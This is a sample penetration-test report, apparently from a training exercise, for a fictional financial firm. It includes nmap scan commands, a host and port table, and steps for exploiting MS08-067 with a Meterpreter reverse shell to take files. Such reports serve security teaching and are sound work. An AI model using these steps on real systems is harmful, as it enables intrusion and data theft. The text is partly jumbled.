Sample Penetration Testing Report Abhijitt Chougulle

Xsecurity, LLC CONFIDENTIAL Penetration Test Report for
FNB Financial Service
XSecurity, LLC FNB Financial Services,

Suite 180 ● Albuquerque, NM 87048 USA 2101 MASSACHUSETTS AVE NW
Phone 505.xxx.xxxx ● Fax 505.xxx.xxxx WASHINGTON DC 20008
UNITED STATES
CONFIDENTIAL Page | Error: Reference source not found

X S E C U R I T Y, L L C
PenetrationTestingandSecurityAuditforFNBFinancialServices
Warning: THIS DOCUMENT, AND ALL ACCOMPANYING MATERIALS, MAY CONTAIN INFORMATION THAT COULD
SEVERELY DAMAGE OR IMPACT THE INTEGRITY AND SECURITY OF THE ORGANIZATION IS DISCLOSED PUBLICLY.
THIS DOCUMENT, AND ALL ACCOMPANYING MATERIALS, SHOULD BE SAFEGUARDED AT ALL TIMES AND
MAINTAINED IN A SECURE AREA WHEN NOT IN USE. XSECURITY, LLC ASSUMES NO RESPONSIBILITY OR LIABILITY
FOR THE SECURITY OF THIS DOCUMENT OR ANY ACCOMPANYING MATERIALS AFTER DELIVERY TO THE
ORGANIZATION NAMED HEREIN. IT IS THE ORGANIZATION’S RESPONSIBILITY TO SAFEGUARD THIS MATERIAL
AFTER DELIVERY.
THIS REPORT CONTAINS PROPRIETARY INFORMATION THAT IS NOT TO BE SHARED, COPIED, DISCLOSED OR
OTHERWISE DIVULGED WITHOUT THE EXPRESS WRITTEN CONSENT OF XSECURITY OR THEIR DESIGNATED
REPRESENTATIVE.USE OF THIS REPORTING FORMAT BY OTHER THAN XSECURITY OR ITS SUBSIDIARIES IS STRICTLY
PROHIBITED AND MAY BE PROSECUTED TO THE FULLEST EXTENT OF THE LAW.
Disclaimer: THE RECOMMENDATIONS CONTAINED IN THIS REPORT ARE BASED ON INDUSTRY STANDARD
“BEST PRACTICES”. BEST PRACTICES ARE, BY NECESSITY, GENERIC IN NATURE AND MAY NOT TAKE INTO ACCOUNT
EXACERBATING OR MITIGATING CIRCUMSTANCES. THESE RECOMMENDATIONS, EVEN IF CORRECTLY APPLIED, MAY
CAUSE CONFLICTS IN THE OPERATING SYSTEM OR INSTALLED APPLICATIONS. ANY RECOMMENDED CHANGES TO
THE OPERATING SYSTEM OR INSTALLED APPLICATION SHOULD FIRST BE EVALUATED IN A NON-PRODUCTION
ENVIRONMENT BEFORE BEING DEPLOYED IN YOUR PRODUCTION NETWORK.
XSECURITY, LLC
SUITE 180 ● ALBUQUERQUE, NM 87048 USA
PHONE 505.XXX.XXXX ● FAX 505.XXX.XXXX
Document Details
Document Title Penetration Testing Report

Company XSecurity, LLC
Recipient FNB Financial Services
Date 6th Jan , 2017

Classification Confidential
Document Type Report
Version 1.0
Author Abhijitt Chougulle
Pen Testers Abhijitt Chougulle,Sandeep Martis
Reviewed By Geeta Singh
Approved By Vikas Singh

Version History Information
Date Version Author Comments
Jan 6th, 2017 v1.3 Vikas Singh Final Draft
Dec 30th, 2016 v1.2 Geeta Singh Checked for formatting and proofreading
Abhijitt
Dec 21st, 2016 v1.1 Edited and made changes to content
Chougulle
Recipient
Name Title Company
Smith Penetration Testing Report FNB Financial Services

Penetration Testing Team Members
Name Company Role
Abhijitt Chougulle XSecurity, LLC Penetration Testing Data Collection

Sandeep Martis XSecurity, LLC Penetration Testing Data Collection
Divyesh Shah XSecurity, LLC Regional Security Practice Manager
Mangesh Shinde XSecurity, LLC FNB Financial Services Services Manager
Devis Baby XSecurity, LLC Principal Consultant
Hrushikesh patil XSecurity, LLC Consultant, Security
FNB Financial
Robert Jude Manager of Network Infrastructure
Services
FNB Financial
Vinay Nair Network Security Analyst
Services
Contact
Name Abhijitt Chougulle

IRIS C,UNNATHI GARDEN ,OPP DEVDAYA NAGAR ,OFF
Address
POKHARAN RD NO 1, THANE (W)-400606
Phone 9819001791
Email abhijitt.chougulle@gmail.com
Table of Contents
Document Details........................................................................................................................................................3
Version History Information.......................................................................................................................................3
Recipient.....................................................................................................................................................................3
Penetration Testing Team Members...........................................................................................................................4
Contact........................................................................................................................................................................4
1.0 Executive Summary...........................................................................................................................................7
1.1. Project Scope.................................................................................................................................................8
1.2. Project Objectives.........................................................................................................................................8
1.3. Target Systems..............................................................................................................................................8
1.4. Assumptions..................................................................................................................................................9
1.5. Timeline........................................................................................................................................................9
1.6. Summary of Evaluation.................................................................................................................................9
1.7. Finding Rating Levels.................................................................................................................................10
1.8. Risk Assessment Metrix..............................................................................................................................10
1.1. Summary of Findings..................................................................................................................................11
1.2. Summary of Recommendation....................................................................................................................12
1.2.1. Personnel............................................................................................................................................12
1.2.2. Policies and Procedures......................................................................................................................12
1.2.3. Critical Vulnerabilities.......................................................................................................................12
1.2.4. Identification and Authentication.......................................................................................................13
1.2.5. Intrusion Detection.............................................................................................................................13
1.2.6. Conclusion..........................................................................................................................................14
1.3. Testing Methodology..................................................................................................................................14
1.3.1. Planning..............................................................................................................................................14
1.3.2. Exploitation........................................................................................................................................14
1.3.3. Reporting............................................................................................................................................14
2.0 Comprehensive Technical Report....................................................................................................................15
[Challenge 1:] Information Gathering......................................................................................................................15

[Challenge 2:] Network Scanning and Service Enumeration...................................................................................17

[Challenge 3:] Database Penetration Testing - SQL Injection..................................................................................20
[Challenge 4:] Cloud Penetration Testing.................................................................................................................25
[Challenge 5:] Penetration Testing WordPress Site for Plugin Vulnerabilities........................................................35
Appendixes...................................................................................................................................................................39
Appendix A: References...........................................................................................................................................40
Appendix B: Glossary...............................................................................................................................................41
List of Tables
Table 1 : Target system.................................................................................................................................................11
Table 2 : Timeline.........................................................................................................................................................12
Table 3 : Severity Lavels..............................................................................................................................................14
Table 4 : Threat Levels.................................................................................................................................................14
Table 5 : Summary of findings.....................................................................................................................................14
Table 6: All Machines IP Address/Operating system/Host names/Open ports/Services running................................50

1.0 Executive Summary

XSecurity, LLC was engaged to conduct a Penetration Testing (Penetration Testing: PT) on the
perimeter and network systems of FNB Financial Services during the period of 12th Nov 2016 to
11th Dec 2016. XSecurity's objective was to discover significant vulnerabilities within the FNB
Financial Services network infrastructure. The findings are to be utilized with a risk analysis to
assist in developing security architecture for FNB Financial Services.
The most significant findings relate to the overall design philosophy behind the FNB Financial
Services trust model, the lack of a consistent Identification and Authentication (I&A) scheme,
the inconsistent and uneven implementation of and compliance with existing policies and
procedures, a lack of sufficient audit controls and procedures, and a significant number of
vulnerabilities that result in the network and systems being susceptible to compromise from the
internal network. The detailed penetration testing findings are described later in this document
and have been ordered according to severity.
The culture and philosophy of the company dictate the trust model. The trust model of an
organization is the philosophical basis upon which the security architecture is built. The security
architecture provides the common framework for all other security tools, policies, and
procedures. FNB Financial Services has a trust model that assumes the internal users of the
network are to be trusted. This model is designed to meet the business needs of FNB Financial
Services in which people routinely change locations within the building and resources need to be
allocated dynamically. The model is designed to meet the needs of a fluid and open business
environment.
The fluid environment at FNB Financial Services creates a situation in which control measures
cannot be easily added to the network infrastructure. Due to the lack of sufficient controls, there
is an environment that frequently results in violations of current policies and procedures that are
not necessarily prevented or detected. Additionally, there is not a mechanism in place to provide
a verified and non-repudiating identity of individuals in the event an intrusion was to occur.
Also, user IDs are locally administered and therefore inconsistent across systems. Finally, there
is an uneven administration of the current policies and procedures, and there are insufficient
reviews of audit logs and information collected from various systems.
The vulnerabilities found during this assessment present several risks to FNB Financial Services.
The most significant of these is that internal intrusions cannot be stopped and that both external
and internal intrusions cannot be detected. Information essential to the protection of critical data
is not available because it is not recorded. The situation is further exacerbated by the discovery
of significant vulnerabilities that would allow an internal user to easily compromise the most
critical information resources. In effect, an internal user could access almost any critical aspect
of the infrastructure and not only would they succeed, but there would be no record of the
intrusion and there would be almost no way of proving if the intrusion occurred or did not occur.
In conclusion, XSecurity strongly recommends that FNB Financial Services install several
intrusion detection systems (IDS) and develop a consistent user Identification and Authentication
Service (I&A) inside the network. XSecurity, LLC also recommends an increase in internal audit

controls to ensure compliance with existing policies and to ensure that timely and adequate
review of log files is occurring.
1.1. Project Scope
The assessment performed was focused on FNB Financial Services’ internal network and its
related application infrastructure. This result is intended to be an overall assessment of FNB
Financial Services network, and those systems and subnets that fall within the scope of this
project.
Furthermore, the findings in this report reflect the conditions found during the testing, and do not
necessarily reflect current conditions.
1.2. Project Objectives
The objective of FNB Financial Services’ network and application assessment is to determine the
overall security by analyzing all possible transactions, user input variables, and application
components that reside on network systems. For the testing, we attempted to perform a black-box
test.
The objective of the security assessment and penetration test of the network infrastructure
supporting the application is to determine the overall security of the network segments and hosts
within the scope of the engagement.
1.3. Target Systems
The following table lists all devices that were targeted during this assessment.
Target System Name FNB Financial Services
Target System URL http://www.fnb.com
Test Type Gray Box

172.19.19.1,
IP Addresses 172.19.19.2,172.19.19.3,172.19.19.4,172.19.19.5,172.19.19.6,172.19.19
Discovered .7,172.19.19.8,172.19.19.9,172.19.19.10,172.17.0.1,172.17.0.2,172.17.0
.3, 10.10.0.1, 10.10.0.2, 10.10.0.3
Network Details Client-server

www.fnb.com,http://10.10.0.2/moviescope,http://10.10.0.2/
Web Server
xsecurity
Network Ports 80,445,22,
System Configuration Intel core i5, 64-bit, 2.67GHz
Table 1: Target system

1.4. Assumptions
We assumed that all IP addresses are public IP addresses and the organization has implemented
the security policies available with them.
1.5. Timeline
The timeline of the test is as below:

Categories Initiation Date/Time Completion Date/Time
Day 1 18th Nov 2016 1st Dec 2016
Day 2 19th Nov 2016 11th Dec 2016
Day 3 2nd Dec 2016 4th Dec 2016
Day 4 4th Dec 2016 11th Dec 2016
Day 5 21st Dec 2016 6th Jan 2017
Table 2: Timeline
1.6. Summary of Evaluation
 Perform broad scans to identify potential areas of exposure and services that may act as
entry points
 Perform targeted scans and manual investigation to validate vulnerabilities
 The test identified components to gain access to”
o <10 IP addressed devices>
 Identify and validate vulnerabilities
 Rank vulnerabilities based on threat level, loss potential, and likelihood of exploitation
 Perform supplemental research and development activities to support analysis
 Identify issues of immediate consequence and recommend solutions
 Develop long-term recommendations to enhance security
 Transfer knowledge
During the network level security checks we tried to probe the ports present on the various
servers and detect the services running on them with the existing security holes, if any. At the
web application level, we checked the web servers’ configuration issues, and more importantly
the logical errors in the web application itself.
1.7. Finding Rating Levels
In the following Findings section, XSecurity, LLC uses a rating system using stars (*) to indicate
the level of severity of our findings. All findings are vulnerabilities that have a business risk to
the FNB Financial Services.
**** Intruders can easily gain control of hosts and network. This
5 Stars Critical
* needs immediate attention.
4 Stars **** High Intruders can possibly gain control of the host, or there may
be potential leakage of highly sensitive information. This
should be addressed as soon as possible.

This could result in potential misuse of the host by intruders.
3 Stars *** Elevated
Address this at your convenience but do as soon as possible.
Intruders may be able to collect sensitive information from
the host, such as the precise version of software installed.
2 Stars ** Moderate With this information, intruders can easily exploit known
vulnerabilities specific to software versions. Address this the
next time you perform a minor reconfiguration of the host.
Intruders can collect information about the host (open ports,
services, etc.) and may be able to use this information to find
1 Stars * Low
other vulnerabilities. Address this the next time you perform
a major reconfiguration of the host.
Table 3: Severity Lavels
1.8. Risk Assessment Metrix
Figure 1: Risk Matrix
L Low 1-4
M Medium 4-12
H High 12-25
Table 4: Threat Levels
1.1. Summary of
Findings
Value Number of Risks

Low 4
Medium 3
High 2
Table 5: Summary of findings

Figure 2: Summary of findings

1.2. Summary of Recommendation
This General Opinion will discuss several overarching concerns that became apparent during the
Penetration Testing. This discussion is intended to provide more in-depth and detailed analysis of
the various issues brought forth in the Executive Summary and provides further illumination on
the more significant risks to FNB Financial Services.
1.2.1. Personnel
While several people involved with maintaining the network and systems have expressed
concerns over the access given to entities (such as developers), the FNB Financial Services
security architecture does not provide, by design, any means of limiting these individual's or
group's network infrastructure access. FNB Financial Services tends to accept the risks
associated with having a completely open internal architecture in order to accommodate the
fluid and changing nature of the environment. However, a documented rationale should
accompany any risks that are accepted.
FNB Financial Services has several knowledgeable and skilled individuals in the Information
Technology department. These individuals are aware of security- related issues and
understand that their internal systems are completely open and accessible. They differ in their
opinions as to the severity of this situation. The situation entrusts a great deal of power and
responsibility, to the point that any one of a handful of administrators, acting independently,
has the capability to compromise a system without any of the other administrators being
aware that any misuse has occurred. This requires a great deal of trust in these administrators,
which is evidently well placed; however, future employees who may hold these positions
may not be as trustworthy. Without measures in place to monitor the activity of such
individuals, current or future intrusions or compromises may not be detectable.
1.2.2. Policies and Procedures

FNB Financial Services has several policies and procedures in place to inform its users of the
responsibilities and obligations associated with the use of information resources. While the
policies in place are adequate in regard to what they address, there appear to be several
missing policies, either policies that are referenced and then are not readily available, or
policies considered necessary that do not appear to be present. These policies would
generally indicate how standards and procedures are to be created and how compliance with
the existing policies, standards, and procedures would be monitored. XSecurity, LLC also
observed and was told through interviews that there is uneven compliance and nonexistent
auditing of these policies.
1.2.3. Critical Vulnerabilities

The large number of vulnerabilities discovered, both those that are critical in and of
themselves as well as those that can be exploited in concert to become critical vulnerabilities,
leave many of the most sensitive systems at FNB Financial Services exposed to internal
users. The firewall and perimeter devices are configured in such a way that it would be very
difficult for an outside user to successfully attack one of the sensitive systems. This is not the
case for an attacker on the inside. Any knowledgeable user could gain complete access to all
of the critical systems of the infrastructure, including the Microsoft .NET Development
Servers and the core network components themselves.
1.2.4. Identification and Authentication

FNB Financial Services does not have an Identification & Authentication (I&A) process.
With the absence of an I&A service, it becomes very difficult to correlate events across
multiple platforms and link them into a single entity. It would also be nearly impossible to
trace an event to an individual or group. These events are occurring, as XSecurity, LLC
noted, during some of the Penetration Testing tests. User IDs and passwords only provide
single-factor identification. In systems where the value of the resource justifies stronger
authentication and the ability to trace a user identity, there must be at least two-factor
authentication: one that is unique to the individual and one generated randomly at the time
credentials are presented. An I&A service, with a time service such as the one FNB Financial
Services already has, can also address one of the more difficult problems that exists in
modern networked environments, the issue surrounding time of a change in privilege versus
the time of privilege usage.
The problem, known as TOCTOU (Time of Change versus Time of Use) comes from a
practice during the old mainframe days where the privilege a user has been granted at log-in.
The user privileges were managed by the systems Reference Monitor, which was an integral
part of the operating system. Therefore, any change in the user's privilege level was
immediately enforced by the operating system, so there was a period of time when the user's
privileges that were in effect did not match the privileges that the user was invoking. In
networked environments, the practice still exists of granting privilege at the time of log-in.
However, because there is no centralized Reference Monitor that is directly tied into each
and every operating system on the network, a change in the user's privilege level is not
registered until the user logs off the network and then logs back on. This is the TOCTOU
problem. Identification and Authentication services, when coupled with a timely service, can
resolve this issue in that they force users to present their credentials before accessing any
resource on the network. This provides a chance for the privileges to be checked, as well as
ensuring the authenticity of the identity of the user ID accessing the resource.
1.2.5. Intrusion Detection

Because of FNB Financial Services's open and fluid environment and the fact that new
network-based threats are identified almost daily, an effective means to detect, react, and
manage events is necessary. An IDS (intrusion detection system) to identify suspect activity
and alert someone of the risk is becoming an increasingly critical part of the security
architecture. In most environments, this would be coupled with segmentation of network
resources across internal firewalls or centralized I&A services. While segmentation may not
be feasible within the current FNB Financial Services trust model and architecture, I&A
services as well as increased auditing are possible.
An IDS hat can conduct profiling as well as one that utilizes signatures would most likely be
the best fit for FNB Financial Services. The profiling of users, especially after the
implementation of an I&A service, would allow for anomalous activity to be detected
immediately and would allow for an automated review of various system logs that are not
being properly reviewed at this time.
1.2.6. Conclusion
Regardless of the frequency of vulnerability testing, no critical system can be considered
acceptably protected unless both the network segments and the critical hosts/servers are
monitored constantly for signs of abuse and intrusion attempts. Because new exploits and
vulnerabilities within devices and network operating systems are discovered regularly, it is
impossible to test a network completely, giving 100 percent assurance of being impervious to
penetration either from within or from outside. Additionally, FNB Financial Services has
chosen a trust model in which the application of stronger internal controls is more difficult
than in a more restrictive trust model. Therefore, the easiest method of detecting misuses
would be some type of intrusion detection system that is both network based and can do user
profiling. Without appropriate identification and authentication of users, referencing abuses
to specific individuals becomes unreliable. Without appropriate audit controls to ensure
compliance with policies, the policies and procedures themselves become untenable.
XSecurity, LLC believes the corrective actions and recommendations in this report will
improve FNB Financial Services's ability to avoid breaches of information security.
However, XSecurity, LLC strongly recommends that an Intrusion Detection and

Identification and Authentication capability be added to the network to detect misuse and
intrusions and provide the information necessary to support forensic investigations. It is also
recommended that additional audit controls such as compliance testing, independent log
review, or configuration audits be implemented, with the results of these controls
incorporated with the results of the IDS capability. A policy and procedure review, combined
with a risk analysis, would also be very beneficial at this point in time to streamline and
reiterate those policies that are critical to the functioning of the enterprise.
1.3. Testing Methodology
1.3.1. Planning
During the planning, we gather information from the server in which the web application is
installed. Then, we detect the path information and identifiable software and determined the
running their versions.
1.3.2. Exploitation
Utilizing the information gathered during the planning, we start to find the vulnerability for
each piece of software and service that we discovered after that trying to exploit it.
1.3.3. Reporting
Based on the results from the first two steps, we start analyzing the results. Our risk rating is
based on this calculation:
Risk = Threat * Vulnerability * Impact
After calculating the risk rating, we start writing the report on each risk and how to mitigate
it.
2.0 Comprehensive Technical Report

CHALLENGE 1:
Objective:
Identify all the machines in the network. You have to present:
IP addresses of all the machines
Operating systems and their versions
Open ports in all the machines
Services running in all the open ports
Your scope of work in this challenge is limited to the scanning methodology.
Tools Used: Zenmap,SolarWinds,Nessus

Zenmap Tool:
The Zenmap tool is actually a graphical front end for the very popular Nmap command line tool.
Nmap is an open source tool for network security and auditing. Although Nmap is incredibly
powerful, when working with larger networks most administrators do not want to work with
command line only tools. And besides, as they say "A picture is worth a thousand words". In this
case that is very much true because Zenmap will give you an interactive graphical map of your
network.
SolarWinds: IT monitoring and management tools are built for SysAdmins and network
Nessus : Nessus is a remote security scanning tool, which scans a computer and raises an alert
if it discovers any vulnerabilities that malicious hackers could use to gain access to any
computer you have connected to a network.
Methodology:
We need to identify all the machines in the network and we do not have any details.
From the Windows machine first found the Gateway of the machine by ipconfig/all ie.
192.168.1.1 (screen shot given below)

S
Figure 1.1
Then with the help of Solarwind discovered other network IP address ie
172.19.19.1,172.17.0.1,10.10.0.1,.(screen shot given below)
Figure 1.2
With the help of 172.19.19.1,172.17.0.1,10.10.0.1 further discovered live ip address of

respective network machines.(screen shot given below)
Live hosts of Network (172.19.19.0) :-
With Zenmap tool and command nmap -sn -T4 -v 172.19.19.1/24 Found live hosts
172.19.19.1,172.19.19.2,12.19.19.3,172.19.19.4,172.19.19.5,172.19.19.6,172.19.19.7,172.19.19.
8,172.19.19.9,172.19.19.10

Figure 1.3
With Zenmap tool and command nmap -sn -T4 -v 172.17.0.1/24 .Found live hosts
172.17.0.1,172.17.0.2,172.17.0.3

Figure 1.4
With Zenmap tool and command nmap -sn -T4 -v 10.10.0.1/24 Found live hosts 10.10.0.1,
10.10.0.2, 10.10.0.3

Figure 1.5
All Host Topology Diagram:

Operating systems and their versions :
Operating System and version of Machine 10.10.01 :Microsoft Windows Server 2003 with
Service Pack 2 (SP2) ver 5.2 and Build 3790
With Zenmap tool and command nmap -p 445 --script smb-os-discovery 10.10.0.1 discovered the
operating system and host name of machine 10.1.0.1
Figure 1.6
Operating System and version of Machine 10.10.0.2 :

Microsoft Windows Server 2008 R2 Enterprise Service Pack 1(SP1) ver 6.1 Build 7601

Figure 1.7
Operating System and version of Machine 10.10.03 :


Figure 1.8
Microsoft Windows Server 2003 with Service Pack 2 (SP2) ver 5.2 and Build 3790
AND


Figure 1.9

Linux Kernel 2.6 on CentOS Release 6.4 Final
With the help of Zenmap tool coudn’t discover the operating system of the this machine
hence used Nesus tool to discover operating system of 172.17.0.3

Figure 1.10

Microsoft Windows Server 2003 with Service Pack 2 (SP2) ver 5.2 and Build 3790
AND

Microsoft Windows 7 ultimate with service pack 1(SP1) ver 6.1 and Build 7601

Figure 1.11

Microsoft Windows server 2008 standard with service pack 1 (SP1) ver 6.0 and Build 6001
AND


Figure 1.11

Linux Kernel 3.0 on Ubuntu 12.04

Figure 1.11

Microsoft Windows server 2012 Data center Edition

Figure 1.12
Found the host

name (HRDEPT)
of this Machine
through
aggressive scan
command of nmap
ie nmap -T4 -A -v
172.19.19.6
Operating
System and
version of
Machine
172.19.19.7 :

AND
Microsoft windows XP
Figure 1.13


Microsoft Windows 8 pro with service pack 1(SP1) ver 6.2 Build 9200
AND
Microsoft Windows 7 ultimate with service pack 1(SP1) ver 6.1 and Build 7601
Figure 1.14

Open ports in all the machines /Services running in all the open ports
Open ports and services running of Machine 10.10.01 :

With Zenmap tool and command nmap -sS -sV -T4 -v 10.10.0.1/24 discovered the open ports and
services running of machine 10.10.0.1
Figure 1.15
Open ports and services running of Machine 10.10.02 :


Figure 1.16
Open ports and services running of Machine 10.10.03:

Figure 1.17
Open ports and services running of Machine 172.17.0.1:


Figure 1.18


Figure 1.19


Figure 1.20
Figure 1.21

Figure 1.22


Figure 1.23


Figure 1.24


Figure 1.25

With Zenmap tool and command nmap -sS -sV -T4 -v 172.19.19.6/24 discovered the open ports and services
running of machine 172.19.19.6

Figure 1.26


Figure 1.27

Figure 1.28


Figure 1.29


Figure 1.19

HAVE LISTED THE GIVEN BELOW WHICH CAN BE USED AS REFERENCE FOR FUTHER
PENTEST :
LIST OF ALL IP ADDRESS OF ALL MACHINES/OPERATING SYSTEM AND THERE VERSIONS/HOST
NAMES/OPEN PORTS IN RESPECTIVE MACHINE AND SERVICES RUNNING IN ALL OPEN PORTS
Sr IP address of Operating system Host names Open ports in Services running in all open
no all Machines and there versions respective ports
machine
1 172.19.19.1 Microsoft GNAT 135 msrpc
Windows Server 139 netbios-ssn
2003 with Service 445 microsoft-ds
Pack 2 (SP2) ver 1025 msrpc
5.2 and Build 3389 mswbt-server
3790
2 172.19.19.2 Microsoft ACCOUNTS 80 http

Windows 7 135 msrpc
ultimate with 139 netbios-ssn
service pack 445 netbios-ssn
1(SP1) ver 6.1 and 3389 ms-wbt-server
Build 7601 49152 msrpc
49153 msrpc
49154 msrpc
49155 msrpc
49156 msrpc
49157 msrpc

3 172.19.19.3 Microsoft Windows WIN-ULY858KHQIP 53 domain

server 2008 80 http
standard with 88 kerberos-sec
service pack 1 135 msrpc
(SP1) ver 6.0 and 139 netbios-ssn
Build 6001 389 ldap
445 microsoft-ds
464 kpasswd5
593 ncacn_http
636 tcpwrapped
3268 ldap
3269 tcpwrapped
3389 ms-wbt-server
5357 http
49152 msrpc
49153 msrpc
49154 msrpc
49155 msrpc
49157 ncacn_http
49158 msrpc
49161 msrpc
49165 msrpc
4 172.19.19.4 Microsoft ADVERTISEMENT 21 tcpwrapped

Windows server 80 http
2008 standard 135 msrpc
with service pack 139 netbios-ssn
1 (SP1) ver 6.0 445 netbios-ssn
and Build 6001 5357 http
49152 msrpc
49153 msrpc
49154 msrpc
49155 msrpc
49156 msrpc
49157 msrpc
5 172.19.19.5 Linux Kernel 3.0 UBUNTU HOST 80 http

on Ubuntu 12.04

6 172.19.19.6 Microsoft HRDEPT 80 http

Windows server 135 msrpc
2012 Data center 139 netbios-ssn
Edition 445 netbios-ssn
3306 mysql
49152 mysql
49153 msrpc
49154 msrpc
49155 msrpc
49156 msrpc
49157 msrpc
49158 msrpc
7 172.19.19.7 Microsoft MARKETING 80 http

2008 standard 139 netbios-ssn
with service pack 445 netbios-ssn
1 (SP1) ver 6.0 5357 http
and Build 6001 49152 msrpc
49153 msrpc
49154 msrpc
49155 msrpc
49156 msrpc
49157 msrpc
8 172.19.19.8 Microsoft OPERATIONS 135 msrpc

windows XP 139 netbios-ssn
445 microsoft-ds
3389 mswbt-server
9 172.19.19.9 Microsoft RDDEPT 21 ftp

Windows 8 pro 80 http
with service pack 135 msrpc
1(SP1) ver 6.2 139 netbios-ssn
Build 9200 445 netbios-ssn
3306 mysql
3389 ms-wbt-server
49152 msrpc
49153 msrpc
49154 msrpc
49155 msrpc
49156 msrpc
49157 msrpc
49158 msrpc

10 172.19.19.10 Microsoft SALES 80 http

Windows 7 135 msrpc
1(SP1) ver 6.1 and 3306 ms-wbt-server
49152 msrpc
49153 msrpc
49154 msrpc
49155 msrpc
49156 msrpc
49157 msrpc

3790
12 172.17.0.2 21
Microsoft WIN-AG46I02QBKJ 80 tcpwrapped
Windows Server 135 http
2008 R2 139 msrpc
Enterprise Service 445 netbios-ssn
Pack 1(SP1) ver 3389 netbios-ssn
6.1 Build 7601 49152 ms-wbt-server
49153 msrpc
49154 msrpc
49155 msrpc
49156 msrpc
49157 msrpc
msrpc
13 172.17.0.3 Linux Kernel 2.6 CENTOS HOST 21 ftp

on CentOS 22 ssh
Release 6.4 Final 23 telnet

3790

15 10.10.0.2 ENTERTAINMENT 21 tcpwrapped

Microsoft 80 http
Windows Server 135 msrpc
2008 R2 139 netbios-ssn
Enterprise Service 445 netbios-ssn
Pack 1(SP1) ver 3389 ms-wbt-server
6.1 Build 7601 49152 msrpc
49153 msrpc
49154 msrpc
49155 msrpc
49156 msrpc
49157 msrpc
16 10.10.0.3 ECOMM 80 http

Microsoft 135 msrpc
Enterprise Service 3306 mysql
Pack 1(SP1) ver 3389 ms-wbt-server
6.1 Build 7601 49152 msrpc
49153 msrpc
49154 msrpc
49155 msrpc
49156 msrpc
49157 msrpc
Table 6 : All Machines IP Address/Operating system/Host names/Open ports/Services running
CHALLENGE 2:
Objective:
Exploit and root the machine named Operations and do the following:
1. Present the hash value of the file “Employee Insurance Details.xlsx” hidden somewhere
in the user folders.
2. FNB management has discovered one of their employees has transferred sensitive
information outside the organization using their machine. The network admin tried to
ascertain this but could not find anything concrete. He however did discover some large
images in a folder named Personal. This was in violation to the organization’s policy of
not storing any personal information on office computers. As a penetration tester, your
task is to verify if these images were used to send sensitive information and present the
hidden message in the pen testing report.

IP address of all Operating Host names Open ports in Services running in all open
Machines system and there respective machine ports
versions
172.19.19.8 Microsoft OPERATIONS 135 msrpc

windows XP 139 netbios-ssn
445 microsoft-ds
3389 mswbt-server
.
Threat Description: This is a remote code execution vulnerability. An attacker who
successfully exploited this vulnerability could take complete control of an affected system
remotely. On Microsoft Windows 2000-based, Windows XP-based, and Windows Server 2003-
based systems, an attacker could exploit this vulnerability over RPC without authentication and
could run arbitrary code. If an exploit attempt fails, this could also lead to a crash in Svchost.exe.
If the crash in Svchost.exe occurs, the Server service will be affected. The Server service
provides file, print, and named pipe sharing over the network.
The vulnerability is caused by the Server service, which does not correctly handle specially
crafted RPC requests.
Tools Used:
Nessus : Nessus is a remote security scanning tool, which scans a computer and raises an alert
if it discovers any vulnerabilities that malicious hackers could use to gain access to any
computer you have connected to a network.
QuickStego : QuickStego lets you hide text in pictures so that only other users of QuickStego
can retrieve and read the hidden secret messages. Once text is hidden in an image the saved
picture is still a 'picture', it will load just like any other image and appear as it did before.
Methodology:
Challenge 2.1: Present the hash value of the file “Employee Insurance Details.xlsx” hidden
somewhere in the user folders.
With the help of Nessus Tool done the Vulnerability assessment and found the vulnerability
MS08-067 which is a remote code execution vulnerability

Figure 2.1.1
Then searched for the exploit module from Rapid7 website shown below

Figure 2.1.2

Figure 2.1.3
By using Kali Operating system machine, started the exploit process by opening command line terminal,
and typed msfconsole and pressed Enter. This launched msfconsole.

Figure 2.1.4
Then searched for exploit as shown in below Figure2.1.5
Figure 2.1.5
Search results of the screen shot and used the searched exploit as shown below Figure2.6 a

Figure2.1.6
Then used the show command to search for the payload option
Figure2.1.7
Then searched the windows/meterpreter/reverse_tcp payload

Figure2.1.8
Then set the payload as shown in given below figure.

Figure2.1.9

The typed show options command as shown below to check for the LHOST,RHOST,RPORT
Figure2.1.10

The typed show options command as shown below to check for the LHOST,RHOST,RPORT
Figure2.1.11

Then set the LHOST,RHOST,RPORT,LPORT and then exploitation done.

Figure2.1.12
After getting the meterpreter session searched for the “Employee Insurance details.xlsx “ and downloaded the file
“Employee Insurance details.xlsx “
Figure2.1.13

After downloading the file extracted out the md5sum value of the file “Employee Insurance details.xlsx “
Figure2.1.14
Recommendation:
Block TCP ports 139 and 445 at the firewall .These ports are used to initiate a connection with
the affected component. Blocking TCP ports 139 and 445 at the firewall will help protect
systems that are behind that firewall from attempts to exploit this vulnerability. Microsoft
recommends that you block all unsolicited inbound communication from the Internet to help
prevent attacks that may use other ports.
Also Microsoft have stopped support for Windows XP.It is recommended that not use windows
Xp since there are no secuirty patches and update available for the same.
3. Challenge 2.2 : FNB management has discovered one of their employees has transferred
sensitive information outside the organization using their machine. The network admin
tried to ascertain this but could not find anything concrete. He however did discover
some large images in a folder named Personal. This wasin violation to the organization’s
policy of not storing any personal information on office computers. As a penetration
tester, your task is to verify if these images were used to send sensitive information and
present the hidden message in the pen testing report.

MS08-067 which is a remote code execution vulnerability
Figure2.1.1
Searched for the exploit module from Rapid7.com website

Figure2.1.2
Searched for the exploit module from Rapid7.com website ,searched results given below.

Figure2.1.3
We launched a new command line terminal, typed msfconsole and pressed Enter. This
launches msfconsole.

Figure2.1.4
Then
searched for
exploit as
shown in
below
Figure
Figure2.1.5
Then typed the use command with the searched module as shown in given below figure.

Figure2.1.5
Displayed below is the results of the use command with the searched module

Figure2.1.6

Then searched the windows/meterpreter/reverse_tcp payload shown in figure below

Figure 2.1.7
Displayed below is the complete results of the use command with the searched module

Figure 2.1.8

The typed show options command as shown below to check for the LHOST,RHOST,RPORT,LPORT
Figure 2.1.9
Then set the LHOST,RHOST,RPORT,LPORT and then exploited

Figure 2.1.9
After gaining the meterpreter session searched for the Jpg and bmp files with the help of the search command found
the
files in c:\Documents and settings\Administrator\My Documents\Personal folder.

Figure 2.1.1

After searching downloaded the jpg and bmp files from c:\Documents and
settings\Administrator\MyDocuments\Personal folder .
Figure 2.1.12
After downloading personal folder, changed the access permissions and copied the folder from root and paste in
root/var/www, Started the apache server
Figure 2.1.11
Through Apache
web browsed the
directory
containing
jpg,bmp files.

Figure 2.1.12
Thumbnail view of the jpg and bmp files in the folder
Figure 2.1.12

QuickStego lets you hide text in pictures so that only other users of QuickStego can retrieve and
read the hidden secret messages.From the 4 jpg,bmp file .With the help of this tool retrieved the
message from the bmp file The_sower.bmp
Figure 2.1.13
Recommendation: Further Strengthen the IT security policy and information access to be given
